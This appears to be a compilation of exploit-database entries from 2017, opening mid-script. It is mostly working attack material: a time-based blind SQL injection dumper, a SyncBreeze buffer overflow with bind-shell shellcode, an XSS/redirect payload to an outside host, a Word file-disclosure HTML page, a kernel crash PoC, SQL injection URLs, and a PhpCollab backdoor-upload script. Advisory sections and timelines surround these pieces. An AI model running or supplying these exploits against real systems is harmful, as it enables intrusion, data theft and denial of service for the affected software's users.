cookjar = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookjar))
try:
req = urllib2.Request('http://%s/?module=fileman&page=login&action=login'%(host), post_data)
content = opener.open(req)
global data,cookie
data = dict((cookie.name, cookie.value) for cookie in cookjar)
cookie = ("language=english; FileRunSID=%s"%(data['FileRunSID']))
return str(content.read())
except:
print '\n[-] Uh oh! Exploit fail.. PLEASE CHECK YOUR CREDENTIAL'
sys.exit(0)
def konek(m,n):
#borrow from SQLmap :)
query=("7) AND (SELECT * FROM (SELECT(SLEEP(%s-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),%s,1))>%s,0,1)))))wSmD) AND (8862=8862" %(delay,m,n))
values = { 'metafield': query,
'searchType': 'meta',
'keyword': 'work',
'searchPath': '/ROOT/HOME',
'path': '/ROOT/SEARCH' }
req = urllib2.Request(target, urllib.urlencode(values))
req.add_header('Cookie', cookie)
try:
starttime=time.time()
response = urllib2.urlopen(req)
endtime = time.time()
return int(endtime-starttime)
except:
print '\n[-] Uh oh! Exploit fail..'
sys.exit(0)
print "[+] Logging in to the application..."
sleep(1)
cekmasuk = masuk(username,password)
if u'success' in cekmasuk:
print "[*] Using Time-Based method with %ds delay."%int(delay)
print "[+] Starting to dump current database. This might take time.."
sys.stdout.write('[+] Target current database is: ')
sys.stdout.flush()
starttime = time.time()
for m in range(1,256):
for n in range(32,126):
wkttunggu = konek(m,n)
if (wkttunggu < delay):
sys.stdout.write(chr(n))
sys.stdout.flush()
break
endtime = time.time()
print "\n[+] Done in %d seconds" %int(endtime-starttime)
----------------------------
Title: CVE-2017-14620
----------------------------
TL;DR: SmarterStats Version 11.3.6347, and possibly prior versions,
will Render the Referer Field of HTTP Logfiles in URL /Data/Reports/ReferringURLsWithQueries
----------------------------
Author: David Hoyt
Date: September 29, 2017
----------------------------
CVSS:3.0 Metrics
CVSS:3.0 Vector String: AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C/CR:M/MAV:N/MAC:L/MPR:N/MUI:R/MS:U/MC:L/MI:N/MA:N
CVSS:3.0 Scores: Base Score 4.3, Temporal Score: 4.1, Environmental Score: 4.1
----------------------------
Keywords
----------------------------
CVE-2017-14620, CWE-533, CWE-532, CWE-117, CWE-93, CAPEC-86, CAPEC-79, Stored Document Object Model Cross Site Scripting (Stored DOM XSS),
Client Side Request Forgery (CSRF), Open Redirection, HTTP Logfiles, Exploit, PoC, HTML Tags, SmarterStats 11.3
----------------------------
CVE-2017-14620 Requirements
----------------------------
SmarterStats Version 11.3
HTTP Proxy (BurpSuite, Fiddler)
Web Browser (Chrome - Current/Stable)
User Interaction Required - Must Click Referer Link Report
Supported Windows OS
Microsoft .NET 4.5
----------------------------
CVE-2017-14620 Reproduction
----------------------------
Vendor Link https://www.smartertools.com/smarterstats/website-analytics
Download Link https://www.smartertools.com/smarterstats/downloads
Step 1: Test with an HTTP Logfile containing a URL-encoded String to the Referer Field with HTML Tags to be Rendered in a Browser:
http://www.bing.com/search?q=<html><head><meta http-equiv=\"refresh\" content=\"5;
url=http://xss.cx/\"><title>Loading</title></head>\n<body><form method=\"post\"
action=\"http://xss.cx/\" target=\"_top\" id=\"rf\"><input type=\"hidden\"
name=\"ic\" value=\"0\"><input type=\"hidden\" name=\"fb\" value=\"true\"/>
</form>\n<script>!function(e,t){var n,i;return!e.navigator&form=nnn
Step 2: Verify the Injected IIS Logfile
Step 3: Process the Logfiles, Select the Referer URL Report.
In an HTTP Proxy, watch the URL http://localhost:9999/Data/Reports/ReferringURLsWithQueries
when Browsing http://localhost:9999/Default.aspx in Chrome (current/stable).
Step 4: Verify the Result in your HTTP Proxy returned from the Server:
{"c":[{"v":"http://www.bing.com/search?q=<html><head><meta http-equiv=\"refresh\"
content=\"5; url=http://xss.cx/\"><title>Loading</title></head>\n<body>
<form method=\"post\" action=\"http://xss.cx/\" target=\"_top\" id=\"rf\">
<input type=\"hidden\" name=\"ic\" value=\"0\"><input type=\"hidden\" name=\"fb\" value=\"true\"/>
</form>\n<script>!function(e,t){var n,i;return!e.navigator&form=nnn"},{"v":"2","f":"2"}]}
In your Browser, the HTTP Response will cause a GET to xss.cx after 5 seconds. Verify in HTTP Proxy.
...
GET / HTTP/1.1
Host: xss.cx
...
Step 5: Watch your Browser get Redirected to XSS.Cx.
----------------------------
Summary: The Referer Field in IIS Logfiles, and possibly other Field Names, are Rendered by SmarterStats Version 11.3.6347.
----------------------------
Timeline
----------------------------
Reported to SmarterTools on September 19, 2017
Obtain CVE-2017-14620 from MITRE on September 20, 2017
Resolved September 28, 2017 with Version 11.xxxx
# # # # #
# Exploit Title: WordPress Plugin WPHRM - SQL Injection
# Dork: N/A
# Date: 29.09.2017
# Vendor Homepage: http://mojoomla.com/
# Software Link: https://codecanyon.net/item/wphrm-human-resource-management-system-for-wordpress/20555857
# Demo: http://mobilewebs.net/mojoomla/extend/wordpress/wphrm/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-14848
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an employee users to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/?hr-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
#
# -23+union+select 1,2,3,4,5,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),7,8--%20-
#
# http://localhost/[PATH]/?hr-dashboard=user&page=user&tab=view_employee&action=view&employee_id=[SQL]
#
# Etc..
# # # # #
# Exploit Title: PHP Multi Vendor Script v1.02 - 'sid' Parameter SQL Injection
# Date: 2017-09-28
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.dexteritysolution.com/
# Software Link: http://www.dexteritysolution.com/php-multivendor-e-commerce-script.html
# Version: 1.02
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-28
Product & Service Introduction:
===============================
In this business world everyone prefers to do online shopping in order to make their shopping easily because it consumes time.
Technical Details & Description:
================================
SQL injection on [sid] parameter.
Proof of Concept (PoC):
=======================
SQLi:
http://localhost/[path]/single_detail.php?sid=15 AND 5068=5068
Parameter: sid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sid=15 AND 5068=5068
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: sid=15 AND SLEEP(5)
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: [SyncBreeze POST username overflow]
# Date: [30-Sep-2017]
# Exploit Author: [Owais Mehtab]
# Vendor Homepage: [http://www.syncbreeze.com]
# Software Link: [http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe]
# Version: [10.0.28]
# Tested on: [Windows 7]
#!/usr/bin/python
import socket
import os
import sys
crash = "A" * 1000
# jmp = 10 09 0c 83 libspp.dll
# bad char = 00 0A 0D 25 26 2B 3D
bind shell on port 4444
buf = ""
buf += "\xb8\x3b\xcc\xbe\xaa\xdb\xd2\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x53\x31\x43\x12\x83\xc3\x04\x03\x78\xc2\x5c"
buf += "\x5f\x82\x32\x22\xa0\x7a\xc3\x43\x28\x9f\xf2\x43\x4e"
buf += "\xd4\xa5\x73\x04\xb8\x49\xff\x48\x28\xd9\x8d\x44\x5f"
buf += "\x6a\x3b\xb3\x6e\x6b\x10\x87\xf1\xef\x6b\xd4\xd1\xce"
buf += "\xa3\x29\x10\x16\xd9\xc0\x40\xcf\x95\x77\x74\x64\xe3"
buf += "\x4b\xff\x36\xe5\xcb\x1c\x8e\x04\xfd\xb3\x84\x5e\xdd"
buf += "\x32\x48\xeb\x54\x2c\x8d\xd6\x2f\xc7\x65\xac\xb1\x01"
buf += "\xb4\x4d\x1d\x6c\x78\xbc\x5f\xa9\xbf\x5f\x2a\xc3\xc3"
buf += "\xe2\x2d\x10\xb9\x38\xbb\x82\x19\xca\x1b\x6e\x9b\x1f"
buf += "\xfd\xe5\x97\xd4\x89\xa1\xbb\xeb\x5e\xda\xc0\x60\x61"
buf += "\x0c\x41\x32\x46\x88\x09\xe0\xe7\x89\xf7\x47\x17\xc9"
buf += "\x57\x37\xbd\x82\x7a\x2c\xcc\xc9\x12\x81\xfd\xf1\xe2"
buf += "\x8d\x76\x82\xd0\x12\x2d\x0c\x59\xda\xeb\xcb\x9e\xf1"
buf += "\x4c\x43\x61\xfa\xac\x4a\xa6\xae\xfc\xe4\x0f\xcf\x96"
buf += "\xf4\xb0\x1a\x02\xfc\x17\xf5\x31\x01\xe7\xa5\xf5\xa9"
buf += "\x80\xaf\xf9\x96\xb1\xcf\xd3\xbf\x5a\x32\xdc\xae\xc6"
buf += "\xbb\x3a\xba\xe6\xed\x95\x52\xc5\xc9\x2d\xc5\x36\x38"
buf += "\x06\x61\x7e\x2a\x91\x8e\x7f\x78\xb5\x18\xf4\x6f\x01"
buf += "\x39\x0b\xba\x21\x2e\x9c\x30\xa0\x1d\x3c\x44\xe9\xf5"
buf += "\xdd\xd7\x76\x05\xab\xcb\x20\x52\xfc\x3a\x39\x36\x10"
buf += "\x64\x93\x24\xe9\xf0\xdc\xec\x36\xc1\xe3\xed\xbb\x7d"
buf += "\xc0\xfd\x05\x7d\x4c\xa9\xd9\x28\x1a\x07\x9c\x82\xec"
buf += "\xf1\x76\x78\xa7\x95\x0f\xb2\x78\xe3\x0f\x9f\x0e\x0b"
buf += "\xa1\x76\x57\x34\x0e\x1f\x5f\x4d\x72\xbf\xa0\x84\x36"
buf += "\xcf\xea\x84\x1f\x58\xb3\x5d\x22\x05\x44\x88\x61\x30"
buf += "\xc7\x38\x1a\xc7\xd7\x49\x1f\x83\x5f\xa2\x6d\x9c\x35"
buf += "\xc4\xc2\x9d\x1f"
crash = "A" * 780 + "\x83\x0c\x09\x10" + "\x90"*16 + buf
fuzz="username="+crash+"&password=A"
buffer="POST /login HTTP/1.1\r\n"
buffer+="Host: 192.168.211.149\r\n"
buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Referer: http://192.168.211.149/login\r\n"
buffer+="Connection: close\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: "+str(len(fuzz))+"\r\n"
buffer+="\r\n"
buffer+=fuzz
expl = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.211.149", 80))
expl.send(buffer)
expl.close()
Title: MS Office Word Information Disclosure Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007 32-bits (x86)
Tested on: Windows 8/7/Server 2008/Vista/Server 2003/XP (X86 and x64)
CVE: N/A
Description:
MS Office Word contains an Internet Explorer (IE) Script execution issue through a currently well known vector:
The "Microsoft Scriptlet Component" ActiveX.
Originally found by info sec. researcher Juan Pablo Lopez Yacubian and made public on May, 2008, this issue
allowed web pages to be displayed, inline, in Office documents, rendered by the MS IE rendering engine.
This issue facilitates attacks against the IE rendering engine because some enhanced security features
are not enabled by default. However, Microsoft didn´t think it would be suitable to disable the ActiveX,
back in 2008, for some unknown reason; Additionally, it was not (publicly) known that you could pass
relative URLs to the ActiveX, causing Word/Works documents to reference itself, as HTML, potentially
disclosing sensitive information to malicious attackers, like file contents, the Windows user name, etc..
The PoC below will display, on an alert box, the contents of 'WindowsUpdate.log', that, depending on the
Windows patch level, used to be located on "c:\windows" directory, but currently it resides in the user
that applied the updates directory:
c:\users\%username%\AppData\Local\Microsoft\Windows
Instructions:
a) Save the code below as "Disclose_File.WPS" and host it on your web server of choice.
b) Download it using your prefered web browser, and save it to one of your user´s profile subfolders.
(Could be the home directory too, however nowadays most browsers by default will save the file to the
'Downloads' folder.
c) Open and wait for an alert box showing the contents of "WindowsUpdate.log" to show up. Notice you
can pick up any file as long as you know the full path.
Important: the file must be downloaded and forced in the "Internet Zone" of IE, through the mark of
the web, which is appended by several programs to files downloaded from the web.
-------------Disclose_File.WPS------------------------------------------------------------
<html><body>
<!-- if you want another file name for the Word/Works document, overwrite the 'Disclose_File.wps' with
the file name you wish -->
<object classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389>
<param name=url value="Disclose_File.wps">
</object>
<script language=javascript>
var loc = document.location.href.toLowerCase();
var locNoProtocol = loc.substring(8,loc.length);
var b1 = locNoProtocol.indexOf(String.fromCharCode(47));
var b2 = locNoProtocol.indexOf(String.fromCharCode(47), b1+1);
var b3 = locNoProtocol.indexOf(String.fromCharCode(47), b2+1);
var b4 = locNoProtocol.indexOf(String.fromCharCode(47), b3+1);
var usr = locNoProtocol.substring(b3+1,b4); // returns the Windows user name, when this document is referenced
// through the default "C$" share.
var fileToDisclose = "file://127.0.0.1/c$/users/" + usr + "/appdata/local/microsoft/windows/windowsupdate.log";
// change the above path to match another file you wish to grab the contents.
var t = loc.indexOf("c:"); // Assuming the drive letter for Windows install, including the user´s profile is 'c:'
var tr = loc.indexOf("c$");
if (t != -1)
{
var ns = loc.substring(t+2,loc.length);
document.write('<iframe src="file://127.0.0.1/c$' + ns + '"></iframe>');
}
else if (tr != -1)
{
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",fileToDisclose,0);
x.Send();
fileContents = x.ResponseText;
alert(fileContents);
}
</script>
</body>
</html>
-------------------------------------------------------------------------------------------------------------------
Vulnerable: MS Office 2007
MS Office 2010,2013,2016 have killbitted this ActiveX through specific MS Office killbit settings. If an attacker
is able to somehow bypass it, the vulnerability will surely affect the latest versions.
Tested on: Any Windows version that suppors Office 2007.
Greets to: Juan Pablo Lopez Yacubian, my good friend and original discoverer of the IE Script Exec issue.
# Exploit Title: HBGK DVR V3.0.0 build20161206 - Authentication Bypass
# Date: 24-09-2017
# Vendor Homepage: http://www.hbgk.net/en/
# Exploit Author: RAT - ThiefKing
# Contact: https://www.facebook.com/cctvsuperpassword
# Website: http://tromcap.com
# Category: webapps
# Tested on: V2.3.1 build20160927, V3.0.0 build20161206
# Shodan Dork: NVR Webserver
1. Description
- Any registered user can login when edit cookie userInfo
2. Proof of Concept
- When login successful: DVR save cookie : userInfo + webport with
value: base64 encode (user:pass)
Ex: http://dvr-domain.dynns.com:85 --> When login successful (user:
admin, pass: admin), DVR will save cookie: userInfo85 with value
YWRtaW46YWRtaW4= (admin:admin <-- base64 decode)
But Dvr not check pass with cookie. When not yet login, you add a
cookie: userInfoXX (xx : web port) with value base64 encode (admin: any
words). And go url: http://dvr-domain.dynns.com:XX/doc/page/main.asp. It
will Authentication Bypass
3. Solution:
Update to Firmware version V3.0.0 build20170925
# # # # #
# Exploit Title: ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download
# Dork: N/A
# Date: 29.09.2017
# Vendor Homepage: https://codecanyon.net/user/lemonadeflirt
# Software Link: https://codecanyon.net/item/converto-video-downloader-converter/13225966
# Demo: http://vd.googglet.com/
# Version: 1.4.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The security obligation allows an attacker to arbitrary download files..
#
# Vulnerable Source:
#
# .............
# <?php
#
# include_once('.......php');
# // Check download token
# if (empty($_GET['mime']) OR empty($_GET['token']))
# {
# exit('Invalid download token 8{');
# }
#
# // Set operation params
# $mime = filter_var($_GET['mime']);
# $ext = str_replace(array('/', 'x-'), '', strstr($mime, '/'));
# $url = base64_decode(filter_var($_GET['token']));
# $name = urldecode($_GET['title']). '.' .$ext;
#
# ?>
# .............
# Proof of Concept:
#
# http://localhost/[PATH]/download.php?mime=video/webm&title=Efe&token=[FILENAME_to_BASE64]
#
# Etc...
# # # # #
/*
# Exploit Title: Linux Kernel<4.14.rc3 Local Denial of Service
# Date: 2017-Oct-02
# Exploit Author: Wang Chenyu (Nanyang Technological University)
# Version:Linux kernel 4-14-rc1
# Tested on:Ubuntu 16.04 desktop amd64
# CVE : CVE-2017-14489
# CVE description: This CVE is assigned to Wang Chunyu (Red Hat) and
discovered by Syzkaller. Provided for legal security research and testing
purposes ONLY.
In this POC, skb_shinfo(SKB)->nr_frags was overwritten by ev->iferror = err
(0xff) in the condition where nlh->nlmsg_len==0x10 and skb->len >
nlh->nlmsg_len.
POC:
*/
#include <sys/socket.h>
#include <linux/netlink.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#define NETLINK_USER 31
#define MAX_PAYLOAD 1024 /* maximum payload size*/
struct sockaddr_nl src_addr, dest_addr;
struct nlmsghdr *nlh = NULL;
struct iovec iov;
int sock_fd;
struct msghdr msg;
int main()
{
sock_fd=socket(PF_NETLINK, SOCK_RAW, NETLINK_ISCSI);
if(sock_fd<0)
return -1;
memset(&src_addr, 0, sizeof(src_addr));
src_addr.nl_family = AF_NETLINK;
src_addr.nl_pid = getpid(); /* self pid */
bind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr));
memset(&dest_addr, 0, sizeof(dest_addr));
memset(&dest_addr, 0, sizeof(dest_addr));
dest_addr.nl_family = AF_NETLINK;
dest_addr.nl_pid = 0; /* For Linux Kernel */
dest_addr.nl_groups = 0; /* unicast */
nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));
memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));
nlh->nlmsg_len = 0xac;
nlh->nlmsg_pid = getpid();
nlh->nlmsg_flags = 0;
strcpy(NLMSG_DATA(nlh), "ABCDEFGHabcdefghABCDEFGHabcdef
ghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHab
cdefghAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDD\x10");
iov.iov_base = (void *)nlh;
iov.iov_len = 0xc0;
msg.msg_name = (void *)&dest_addr;
msg.msg_namelen = sizeof(dest_addr);
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
printf("Sending message to kernel\n");
sendmsg(sock_fd,&msg,0);
printf("Waiting for message from kernel\n");
/* Read message from kernel */
recvmsg(sock_fd, &msg, 0);
printf("Received message payload: %s\n", (char *)NLMSG_DATA(nlh));
close(sock_fd);
}
Crash info:
[ 17.880629] BUG: unable to handle kernel NULL pointer dereference at
0000000000000028
[ 17.881586] IP: skb_release_data+0x77/0x110
[ 17.882093] PGD 7b02a067 P4D 7b02a067 PUD 7b02b067 PMD 0
[ 17.882743] Oops: 0002 [#1] SMP
[ 17.883123] Modules linked in:
[ 17.883493] CPU: 1 PID: 2687 Comm: test02 Not tainted 4.14.0-rc1+ #1
[ 17.884251] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 17.885350] task: ffff88007c5a1900 task.stack: ffffc90000e10000
[ 17.886058] RIP: 0010:skb_release_data+0x77/0x110
[ 17.886590] RSP: 0018:ffffc90000e13c08 EFLAGS: 00010202
[ 17.887213] RAX: 000000000000000d RBX: ffff88007bd50300 RCX:
ffffffff820f96a0
[ 17.888059] RDX: 000000000000000c RSI: 0000000000000010 RDI:
000000000000000c
[ 17.888893] RBP: ffffc90000e13c20 R08: ffffffff820f9860 R09:
ffffc90000e13ad8
[ 17.889712] R10: ffffea0001ef5400 R11: ffff88007d001700 R12:
0000000000000000
[ 17.890349] R13: ffff88007be710c0 R14: 00000000000000c0 R15:
0000000000000000
[ 17.890977] FS: 00007f7614d4c700(0000) GS:ffff88007fd00000(0000)
knlGS:0000000000000000
[ 17.891592] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 17.892054] CR2: 0000000000000028 CR3: 000000007b022000 CR4:
00000000000006e0
[ 17.892629] Call Trace:
[ 17.892833] skb_release_all+0x1f/0x30
[ 17.893140] consume_skb+0x27/0x90
[ 17.893418] netlink_unicast+0x16a/0x210
[ 17.893735] netlink_sendmsg+0x2a3/0x390
[ 17.894050] sock_sendmsg+0x33/0x40
[ 17.894336] ___sys_sendmsg+0x29e/0x2b0
[ 17.894650] ? __wake_up_common_lock+0x7a/0x90
[ 17.895009] ? __wake_up+0xe/0x10
[ 17.895280] ? tty_write_unlock+0x2c/0x30
[ 17.895606] ? tty_ldisc_deref+0x11/0x20
[ 17.895925] ? n_tty_open+0xd0/0xd0
[ 17.896211] ? __vfs_write+0x23/0x130
[ 17.896512] __sys_sendmsg+0x40/0x70
[ 17.896805] ? __sys_sendmsg+0x40/0x70
[ 17.897133] SyS_sendmsg+0xd/0x20
[ 17.897408] entry_SYSCALL_64_fastpath+0x13/0x94
[ 17.897783] RIP: 0033:0x7f7614886320
[ 17.898186] RSP: 002b:00007fff6f17f9c8 EFLAGS: 00000246 ORIG_RAX:
000000000000002e
[ 17.898793] RAX: ffffffffffffffda RBX: 00007f7614b2e7a0 RCX:
00007f7614886320
[ 17.899368] RDX: 0000000000000000 RSI: 0000000000600fc0 RDI:
0000000000000003
[ 17.899943] RBP: 0000000000000053 R08: 00000000ffffffff R09:
0000000000000000
[ 17.900521] R10: 0000000000000000 R11: 0000000000000246 R12:
0000000000400b9e
[ 17.901095] R13: 00007f7614d50000 R14: 0000000000000019 R15:
0000000000400b9e
[ 17.901672] Code: 45 31 e4 41 80 7d 02 00 48 89 fb 74 32 49 63 c4 48 83
c0 03 48 c1 e0 04 49 8b 7c 05 00 48 8b 47 20 48 8d 50 ff a8 01 48 0f 45 fa
<f0> ff 4f 1c 74 7a 41 0f b6 45 02 41 83 c4 01 44 39 e0 7f ce 49
[ 17.903190] RIP: skb_release_data+0x77/0x110 RSP: ffffc90000e13c08
[ 17.903689] CR2: 0000000000000028
[ 17.903980] ---[ end trace 2f1926fbc1d32679 ]---
Reference:
[1] https://patchwork.kernel.org/patch/9923803/
[2] https://github.com/google/syzkaller
NPM-V(Network Power Manager) <= 2.4.1 Reset Password Vulnerability
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
Product: NPM-V
Affected Version : 2.4.1 and below
Vendor : http://www.china-clever.com
Product Link : http://www.china-clever.com/en/index.php/product?view=products&cid=125
Date: 2017 Sep 25
Manual: ftp://support.danbit.dk/N/NPOWER8IEC-E/NPM-V%20User%20Manual.pdf
[*] NPM Introduction:
The NPM(Network Power Manager) is a network manageable device that provides power monitoring,
controlling and managements to many equipments in the rack cabinet of data center all over the world through
LAN or WAN. For meeting with the restrictions and requirements in different environment, NPM supplies many
connection methods that user can manage it through its Web interface(HTTP or HTTPS), Serial connection, Telnet
or SNMP
[*] Vulnerability Details:
Based on security Check on this device , Authentication doesn't check on Device Admin Console
an attacker can access to management console pages directly and without authentication.
All files in these directories are directly accessible . /log/ /chart /device and /user .
[*] PoC:
An Attacker can directly access to below page and Add User or View Password or Change Administrator credential without authentication.
if you browse this page you will see an html page likely the image exists on Page 13 (Figure 1-4) on Device Users Manual.
http://[Device IP]/user/user.html
#EOF
# [CVE-2017-6090] PhpCollab 2.5.1 Arbitrary File Upload (unauthenticated)
## Description
PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.
## Arbitrary File Upload
The phpCollab code does not correctly filter uploaded file contents. An unauthenticated attacker may upload and execute arbitrary code.
**CVE ID**: CVE-2017-6090
**Access Vector**: remote
**Security Risk**: Critical
**Vulnerability**: CWE-434
**CVSS Base Score**: 10 (Critical)
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
### Proof of Concept
The following HTTP request allows an attacker to upload a malicious php file, without authentication.
Thus, a file named after `$id.extension` is created.
For example, a backdoor file can be reached at `http://phpCollab.lan/logos_clients/1.php`.
```
POST /clients/editclient.php?id=1&action=update HTTP/1.1
Host: phpCollab.lan
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
Content-Length: 252
-----------------------------154934846911423734231554128137
Content-Disposition: form-data; name="upload"; filename="backdoor.php"
Content-Type: application/x-php
<?php phpinfo(); ?>
-----------------------------154934846911423734231554128137--
```
### Vulnerable code
The vulnerable code is found in `clients/editclient.php`, line 63.
```
$extension = strtolower( substr( strrchr($_FILES['upload']['name'], ".") ,1) );
if(@move_uploaded_file($_FILES['upload']['tmp_name'], "../logos_clients/".$id.".$extension"))
{
chmod("../logos_clients/".$id.".$extension",0666);
$tmpquery = "UPDATE ".$tableCollab["organizations"]." SET extension_logo='$extension' WHERE id='$id'";
connectSql("$tmpquery");
}
```
### Exploit code
```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import requests
if __name__ == '__main__':
if (len(sys.argv) != 4):
print("Enter your target, userid and path for file upload like : python exploit.py http://www.phpCollabURL.lan 1 /tmp/test.php")
sys.exit(1)
target = "%s/clients/editclient.php?id=%s&action=update" % (sys.argv[1], sys.argv[2])
print("[*] Trying to exploit with URL : %s..." % target)
backdoor = {'upload': open(sys.argv[3], 'rb')}
r = requests.post(target, files=backdoor)
extension = os.path.splitext(sys.argv[3])[1]
link = "%s/logos_clients/%s%s" % (sys.argv[1], sys.argv[2], extension )
r = requests.get(link)
if r.status_code == 200:
print("[OK] Backdoor link : %s" % link)
else:
print("[FAIL]Problem (status:%s) (link:%s)" % (r.status_code, link))
```
## Solution
Update to the latest version avalaible.
## Affected versions
* Version <= 2.5.1
## Timeline (dd/mm/yyyy)
* 27/08/2016 : Initial discovery.
* 05/10/2016 : Initial contact.
* 11/10/2016 : GPG Key exchange.
* 19/10/2016 : Advisory sent to vendor.
* 13/02/2017 : First fixes.
* 15/02/2017 : Fixes validation by Sysdream.
* 21/02/2017 : PhpCollab ask to wait before publish.
* 21/06/2017 : New version has been released.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas SERRA, Sysdream (n.serra -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
# [CVE-2017-6089] PhpCollab 2.5.1 Multiple SQL Injections (unauthenticated)
## Description
PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.
## SQL injections
The phpCollab code does not correctly filter arguments, allowing arbitrary SQL code execution by an unauthenticated user.
**CVE ID**: CVE-2017-6089
**Access Vector**: remote
**Security Risk**: Critical
**Vulnerability**: CWE-89
**CVSS Base Score**: 10 (Critical)
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H
## Proof of Concept 1
The following HTTP request allows an attacker to extract data using SQL injections in either the `project` or `id` parameter (it requires at least one topic):
```
http://phpCollab.lan/topics/deletetopics.php?project=1'+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))+and+'2'='2
http://phpCollab.lan/topics/deletetopics.php?project=1&id=1+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))
```
### Vulnerable code
The vulnerable code is found in `topics/deletetopics.php`, line 9.
```
if ($action == "delete") {
$id = str_replace("**",",",$id);
$tmpquery1 = "DELETE FROM ".$tableCollab["topics"]." WHERE id = $id";
$tmpquery2 = "DELETE FROM ".$tableCollab["posts"]." WHERE topic = $id";
$pieces = explode(",",$id);
$num = count($pieces);
connectSql("$tmpquery1");
connectSql("$tmpquery2");
```
## Proof of Concept 2
The following HTTP request allows an attacker to extract data using SQL injections in the `id` parameter (it requires at least one saved bookmark):
```
http://phpCollab.lan/bookmarks/deletebookmarks.php?action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
```
### Vulnerable code
The vulnerable code is found in `bookmarks/deletebookmarks.php`, line 32.
```
if ($action == "delete") {
$id = str_replace("**",",",$id);
$tmpquery1 = "DELETE FROM ".$tableCollab["bookmarks"]." WHERE id IN($id)";
connectSql("$tmpquery1");
```
## Proof of Concept 3
The following HTTP request allows an attacker to extract some information using SQL injection in the `id` parameter (it requires at least one calendar entry):
```
http://phpCollab.lan/calendar/deletecalendar.php?project=&action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
```
### Vulnerable code
The vulnerable code is found in `calendar/deletecalendar.php`, line 31.
```
if ($action == "delete") {
$id = str_replace("**",",",$id);
$tmpquery1 = "DELETE FROM ".$tableCollab["calendar"]." WHERE id IN($id)";
connectSql("$tmpquery1");
```
**Notes**
The application probably needs a security posture against injections, so other parameters and pages may be vulnerables. This advisory does not intend to be an exhaustive list of vulnerable parameters.
## Solution
Update to the latest version avalaible.
## Affected versions
* Version <= 2.5.1
## Timeline (dd/mm/yyyy)
* 27/08/2016 : Initial discovery.
* 05/10/2016 : Initial contact.
* 11/10/2016 : GPG Key exchange.
* 19/10/2016 : Advisory sent to vendor.
* 13/02/2017 : First fixes.
* 15/02/2017 : Fixes validation by Sysdream.
* 21/02/2017 : PhpCollab ask to wait before publish.
